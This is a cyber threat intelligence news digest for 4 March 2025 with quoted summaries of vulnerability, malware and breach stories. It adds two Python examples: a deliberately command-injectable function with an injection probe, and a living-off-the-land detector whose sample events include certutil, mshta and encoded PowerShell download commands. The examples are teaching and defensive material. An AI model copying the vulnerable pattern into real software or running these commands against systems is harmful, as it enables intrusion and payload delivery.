Cyber Threat Intelligence 04 March 2025
New Tooling
- Commix: Open-Source OS Command Injection Exploitation Tool
"Commix is an open-source penetration testing tool designed to automate the detection and exploitation of command injection vulnerabilities, streamlining security assessments for researchers and ethical hackers."
https://www.helpnetsecurity.com/2025/03/03/commix-open-source-os-command-injection-exploitation-tool/
https://github.com/commixproject/commix
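Commix automates finding and exploiting OS command injection. To make concrete what that class of bug looks like, here is an added example, written for this digest and not code from the Commix project or from the article: a shell-out that is injectable, the same function hardened, and a minimal canary probe of the kind an automated scanner runs. The helper names, the directory-listing endpoint and the payload list are assumptions for illustration; only POSIX `ls` and `echo` are used so the block runs offline on Linux/macOS.

```python
"""Added example (not from Commix or the linked article): an injectable
shell-out, its hardened form, and a simplified canary-based probe."""
import re
import secrets
import subprocess

# Allowlist for the only argument we accept: no spaces, no shell metacharacters.
SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]+$")


def list_dir_vulnerable(path: str) -> str:
    """Untrusted input interpolated into a shell string.
    A value such as '.; echo X' makes /bin/sh run a second command."""
    proc = subprocess.run(f"ls -ld {path}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout + proc.stderr


def list_dir_hardened(path: str) -> str:
    """Two independent fixes: (1) reject anything outside a strict allowlist,
    (2) never hand a string to a shell; pass an argv list so `path` is a
    single argument no matter what it contains."""
    if not SAFE_PATH.fullmatch(path) or ".." in path.split("/"):
        raise ValueError(f"rejected path: {path!r}")
    proc = subprocess.run(["ls", "-ld", path], capture_output=True, text=True)
    return proc.stdout + proc.stderr


def probe_command_injection(target, separators=(";", "|", "&&", "\n")) -> list:
    """Canary probe: append '<separator> echo <random token>' to an otherwise
    valid value and check whether the token is reflected. A fresh token per
    attempt avoids false positives from the normal response. This is a
    simplified illustration of what scanners automate, not Commix's own logic."""
    hits = []
    for sep in separators:
        token = secrets.token_hex(8)
        payload = f".{sep} echo {token}"
        try:
            out = target(payload)
        except ValueError:
            continue  # input rejected before it ever reached a shell
        if token in out:
            hits.append(sep)
    return hits


if __name__ == "__main__":
    print("vulnerable:", probe_command_injection(list_dir_vulnerable))  # all four separators
    print("hardened:  ", probe_command_injection(list_dir_hardened))    # []
```

The fix that matters is the argv list; the allowlist is defence in depth. Note that `shell=False` does not help if the argument is later passed to another program that itself spawns a shell, which is why the validation stays.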
Vulnerabilities
- CISA Adds Five Known Exploited Vulnerabilities To Catalog
"CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
CVE-2023-20118 Cisco Small Business RV Series Routers Command Injection Vulnerability
CVE-2022-43939 Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability
CVE-2022-43769 Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability
CVE-2018-8639 Microsoft Windows Win32k Improper Resource Shutdown or Release Vulnerability
CVE-2024-4885 Progress WhatsUp Gold Path Traversal Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/03/03/cisa-adds-five-known-exploited-vulnerabilities-catalog
https://www.bleepingcomputer.com/news/security/cisa-tags-windows-and-cisco-vulnerabilities-as-actively-exploited/
https://securityaffairs.com/174853/security/u-s-cisa-adds-multiple-cisco-small-business-rv-series-routers-hitachi-vantara-pentaho-ba-server-microsoft-windows-win32k-and-progress-whatsup-gold-flaws-to-its-known-exploited-vulnerabilities.html
- Android Security Update Contains 2 Actively Exploited Vulnerabilities
"Google addressed 43 vulnerabilities affecting Android devices in its March security update, including a pair of software defects reportedly under active exploitation. Google said the two vulnerabilities — CVE-2024-43093 and CVE-2024-50302 — “may be under limited, targeted exploitation.”"
https://cyberscoop.com/android-security-update-march-2025/
Malware
- Havoc: SharePoint With Microsoft Graph API Turns Into FUD C2
"Havoc is a powerful command-and-control (C2) framework. Like other well-known C2 frameworks, such as Cobalt Strike, Sliver, and Winos4.0, Havoc has been used in threat campaigns to gain full control over the target. Additionally, it is open-source and available on GitHub, making it easier for threat actors to modify it to evade detection."
https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
https://www.bleepingcomputer.com/news/security/new-clickfix-attack-deploys-havoc-c2-via-microsoft-sharepoint/
https://thehackernews.com/2025/03/hackers-use-clickfix-trick-to-deploy.html
https://www.darkreading.com/cyberattacks-data-breaches/phishers-wreak-havoc-disguising-attack-inside-sharepoint
https://hackread.com/malware-exploits-microsoft-graph-api-infect-windows/
https://www.infosecurity-magazine.com/news/phishing-campaign-havoc-framework/
- Black Basta And Cactus Ransomware Groups Add BackConnect Malware To Their Arsenal
"The Trend Micro Managed XDR and Incident Response (IR) teams recently analyzed incidents where threat actors deploying Black Basta and Cactus ransomware used the same BackConnect malware to strengthen their foothold on compromised machines. The BackConnect malware is a tool that cybercriminals use to establish and maintain persistent control over compromised systems. Once infiltrated, it grants attackers a wide range of remote control capabilities, allowing them to execute commands on the infected machine. This enables them to steal sensitive data, such as login credentials, financial information, and personal files."
https://www.trendmicro.com/en_us/research/25/b/black-basta-cactus-ransomware-backconnect.html
https://hackread.com/fake-it-support-calls-microsoft-teams-users-install-ransomware/
https://www.infosecurity-magazine.com/news/attackers-exploit-microsoft-teams/
- Mobile Malware Evolution In 2024
"These statistics are based on detection alerts from Kaspersky products, collected from users who consented to provide statistical data to Kaspersky Security Network. The statistics for previous years may differ from earlier publications due to a data and methodology revision implemented in 2024."
https://securelist.com/mobile-threat-report-2024/115494/
- Russian Telecom Beeline Facing Outages After Cyberattack
"Some Russians had their internet disrupted on Monday due to a targeted distributed denial-of-service (DDoS) attack on the telecom Beeline — the second major attack on the Moscow-based company in recent weeks. Beeline confirmed the attack to local media following reports from several outage-tracking services and user complaints. The provider has more than 44 million subscribers."
https://therecord.media/russian-telecom-beeline-outages-cyber
- Uncovering .NET Malware Obfuscated By Encryption And Virtualization
"This article examines obfuscation techniques used in popular malware families, and offers some insights into possible opportunities for automating unpacking of these malware samples. We will examine these behaviors in samples we have observed, showing how to extract their configuration parameters through unpacking each stage. Performing this same process through automation would allow a sandbox performing static analysis to extract crucial malware configuration parameters from such samples."
https://unit42.paloaltonetworks.com/malware-obfuscation-techniques/
Breaches/Hacks/Leaks
- Rubrik Rotates Authentication Keys After Log Server Breach
"Rubrik disclosed last month that one of its servers hosting log files was breached, causing the company to rotate potentially leaked authentication keys. The company has confirmed to BleepingComputer that the breach was not a ransomware incident and that it did not receive any communication from the threat actor."
https://www.bleepingcomputer.com/news/security/rubrik-rotates-authentication-keys-after-log-server-breach/
- Indian Stock Broker Angel One Discloses Data Breach
"Indian stock brokerage firm Angel One on Friday disclosed a data breach impacting client information stored in its Amazon Web Services (AWS) account. The incident, the company said, was discovered after it received an email alert from a ‘dark web monitoring partner’ on February 27, regarding a ‘data leakage post’. “After analyzing the post, it was ascertained that some of Angel One’s AWS resources were compromised,” the company said."
https://www.securityweek.com/indian-stock-broker-angel-one-discloses-data-breach/
- Palau Health Ministry On The Mend After Qilin Ransomware Attack
"The health ministry of the Pacific island nation of Palau has recovered from a ransomware attack launched by a gang known for targeting prominent healthcare institutions. Palau officials told Recorded Future News that the February 17 ransomware attack launched by hackers connected to a group named Qilin allowed the infiltrators to steal files from IT systems used by the Ministry of Health and Human Services (MHHS). The ministry runs Belau National Hospital, an 80-bed facility that serves the country’s nearly 20,000 residents spread across hundreds of islands."
https://therecord.media/palau-health-ministry-ransomware-recover
- Several Local Governments Struggling With Cyberattacks Limiting Services
"Government services offered by one of the largest counties in Maryland are still being limited more than a week after it was targeted by a cyberattack. Anne Arundel County, home to nearly 600,000 people and the state capital of Annapolis, first announced the incident on February 23 and as of Monday is warning residents that multiple services are still down."
https://therecord.media/local-govs-cyberattacks-limiting-services
- Polish Space Agency Investigates Cyberattack On Its Systems
"Poland’s space agency (POLSA) announced on Sunday it had suffered a cyberattack and is currently investigating the incident. In response to the attack, the agency said it disconnected its network from the internet, and as of Monday its website remained inaccessible. Poland’s digital minister, Krzysztof Gawkowski, confirmed that state cybersecurity services had detected unauthorized access to POLSA’s IT infrastructure and had secured the affected systems. Cyber specialists are now working to identify the attackers behind the breach, he added."
https://therecord.media/poland-space-cyberattack-agency-investigate
https://www.theregister.com/2025/03/03/polish_space_agency_confirms_cyberattack/
General News
- Unmasking Hacktivist Groups: A Modern Approach To Attribution
"Hacktivism has evolved from grassroots digital protests to sophisticated, state-sponsored cyber operations. Check Point Research analyzed 20,000 messages from 35 hacktivist accounts using machine learning and linguistic analysis to reveal hidden connections and operational patterns. The research highlights how geopolitical events drive hacktivist activities, with groups resurfacing during crises to conduct targeted attacks. Stylometric analysis revealed clusters of hacktivist groups with overlapping linguistic fingerprints, indicating shared operators. For example, Cyber Army of Russia Reborn, Solntsepek, and XakNet form one such cluster. Understanding these operations helps improve cyber threat attribution, providing valuable insights into the evolving hacktivism landscape."
https://blog.checkpoint.com/research/unmasking-hacktivist-groups-a-modern-approach-to-attribution/
- SR-029.022025: MyCERT Report - Cyber Incident Quarterly Summary Report - Q4 2024
"The Cyber Incident Quarterly Summary Report Q4 2024 provides an overview of computer security incidents handled by the Cyber999 Incident Response Centre of CyberSecurity Malaysia in Q4 2024. This quarterly Cyber Incident Report also highlights statistics of incidents dealt with by Cyber999 Incident Response Centre in Q4 2024 according to their categories and security alerts and advisories released in this quarter. It should be noted that the statistics provided in this report reflect only the total number of incidents reported and handled by the Cyber999 Incident Response Centre, excluding elements such as monetary value or aftermaths of the incidents. Computer security incidents dealt with by the Cyber999 Incident Response Centre involved IP addresses and domains from Malaysia."
https://www.mycert.org.my/portal/advisory?id=SR-029.022025
- Latin American Orgs Face 40% More Attacks Than Global Average
"Cyber threats are accelerating faster in Latin America than anywhere else in the world. The trend has been building for at least a year now, actually. Last summer, Check Point tracked a 53% year-over-year rise in weekly cyberattacks against organizations in the region, followed at a distance by Africa (37%) and Europe (35%). Today, the cybersecurity company reports, Latin American companies suffer 2,569 attacks per week on average — nearly 40% more than the global average of 1,848."
https://www.darkreading.com/cybersecurity-analytics/latin-american-orgs-more-cyberattacks-global-average
- Third-Party Risk Top Cybersecurity Claims
"Just because your company has locked down its security does not mean it will avoid losses. That's the lesson from recently-released cyber-insurance data that shows that ransomware costs are increasingly due to compromises at third-party providers and vendors — organizations whose security is not controlled by the businesses eventually impacted by those events."
https://www.darkreading.com/cyber-risk/third-party-risk-top-cybersecurity-claims
- Online Crime-As-a-Service Skyrockets With 24,000 Users Selling Attack Tools
"The growth of AI-based technology has introduced new challenges, making remote identity verification systems more vulnerable to attacks, according to iProov. Innovative and easily accessible tools have allowed threat actors to become more sophisticated overnight, powering an increasing number of threat vectors due to new methodologies."
https://www.helpnetsecurity.com/2025/03/03/remote-identity-verification-attacks/
- How QR Code Attacks Work And How To Protect Yourself
"QR codes have become an integral part of our everyday life due to their simplicity. While they’ve been around for many years, their use exploded during the COVID-19 pandemic, when businesses turned to them for contactless menus, payments, and check-ins. While QR codes are convenient, they also present significant risks. In the past few years, cybercriminals have increasingly turned to these codes as a tool to carry out scams."
https://www.helpnetsecurity.com/2025/03/03/qr-code-attacks/
- Living Off The Land: How Threat Actors Use Your System To Steal Your Data
"Almost every advanced threat actor has added Living off the Land (LotL) techniques into their attacks. LotL is an attack strategy where threat actors conduct malicious activities by exploiting legitimate tools and features already present in a target. The phrase "living off the land" means surviving on resources you find in an existing environment. If the environment is a physical ecosystem like a forest, it means sustaining yourself on what you can forage, grow, etc. If the environment is a digital network, it means conducting an attack with the binaries, scripts, and other tools that are already at work in the victim’s digital environment. The term was applied to these techniques in 2013."
https://blog.barracuda.com/2025/03/03/living-off-the-land--how-threat-actors-use-your-system-to-steal-
- The New Ransomware Groups Shaking Up 2025
"In 2024, global ransomware attacks hit 5,414, an 11% increase from 2023. After a slow start, attacks spiked in Q2 and surged in Q4, with 1,827 incidents (33% of the year's total). Law enforcement actions against major groups like LockBit caused fragmentation, leading to more competition and a rise in smaller gangs. The number of active ransomware groups jumped 40%, from 68 in 2023 to 95 in 2024."
https://thehackernews.com/2025/03/the-new-ransomware-groups-shaking-up.html
https://l.cyberint.com/ransomware-recap-2024
- Threat Report H2 2024: Infostealer Shakeup, New Attack Vector For Mobile, And Nomani
"Sometimes, our telemetry data seems like the waters of a calm bay, with small, smooth waves gently rocking the ships anchored there to sleep. Other times, however, strong winds come and change everything, bringing towering waves and scattering the ships all over the place, transforming the terrain of the bay itself in the process. ESET Threat Report H2 2024 felt a bit like that. Leading malware families were taken down by law enforcement; mobile devices saw the birth of a new, potentially very attractive, attack vector targeting both iOS and Android; there was yet another criminal “crypto gold rush”; and deepfake scams flooded social media."
https://www.welivesecurity.com/en/podcasts/threat-report-h2-2024-infostealer-shakeup-new-attack-vector-mobile-nomani/
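Following up the Living Off The Land item above: the Barracuda post describes the strategy but the practical question for a defender is how to spot trusted binaries being driven for download, proxy execution or encoded commands. Below is an added example, written for this digest and not from the Barracuda post, that runs a small rule set over constructed Windows process-creation events (Sysmon Event ID 1 style fields). The field names, the rule list and the sample events are assumptions for illustration; the argument patterns are the widely documented LOLBin abuses of certutil, mshta, regsvr32, rundll32, PowerShell, bitsadmin and wmic, not indicators taken from the post.

```python
"""Added example (not from the Barracuda post): flag living-off-the-land
patterns in process-creation telemetry. Rules pair a signed system binary
with arguments that only make sense for download, proxy execution or
encoded commands; a benign invocation of the same binary does not hit."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    image: str            # lowercase basename of the process image
    pattern: re.Pattern   # matched against the full command line


RULES = [
    Rule("certutil download/decode", "certutil.exe",
         re.compile(r"-urlcache|-decode|-verifyctl", re.I)),
    Rule("mshta remote script", "mshta.exe",
         re.compile(r"https?://|javascript:|vbscript:", re.I)),
    Rule("regsvr32 scriptlet", "regsvr32.exe",
         re.compile(r"/i:https?://|scrobj\.dll", re.I)),
    Rule("rundll32 script host", "rundll32.exe",
         re.compile(r"javascript:|url\.dll|shell32.*Control_RunDLL", re.I)),
    Rule("powershell encoded/downloading", "powershell.exe",
         re.compile(r"-e(c|nc|ncodedcommand)?\s|DownloadString|\bIEX\b|Invoke-Expression", re.I)),
    Rule("bitsadmin transfer", "bitsadmin.exe",
         re.compile(r"/transfer|/addfile", re.I)),
    Rule("wmic remote process create", "wmic.exe",
         re.compile(r"process\s+call\s+create|/node:", re.I)),
]


def basename(image: str) -> str:
    """Normalise an image path to its lowercase file name (handles both slashes)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event: dict) -> list:
    """Names of every rule whose binary and argument pattern both match the event."""
    img = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    return [r.name for r in RULES if r.image == img and r.pattern.search(cmd)]


def triage(events) -> list:
    """(ProcessId, matched rule names) for each event that hits at least one rule."""
    return [(e["ProcessId"], hits) for e in events if (hits := match_rules(e))]


# Constructed sample events, not real telemetry. 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"ProcessId": "1001", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt"},
    {"ProcessId": "1002", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -store My"},                     # legitimate store query
    {"ProcessId": "1003", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://203.0.113.5/launch.hta"},
    {"ProcessId": "1004", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAo..."},
    {"ProcessId": "1005", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},  # benign admin script
    {"ProcessId": "1006", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "'},
]


if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS):
        print(pid, hits)
```

Because the binaries are legitimate, the signal lives entirely in the arguments and in context (parent process, user, network destination); tune the patterns against your own baseline of admin activity before alerting on them, since `-ExecutionPolicy` and `-File` invocations are deliberately left unflagged here.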
References
Electronic Transactions Development Agency (ETDA)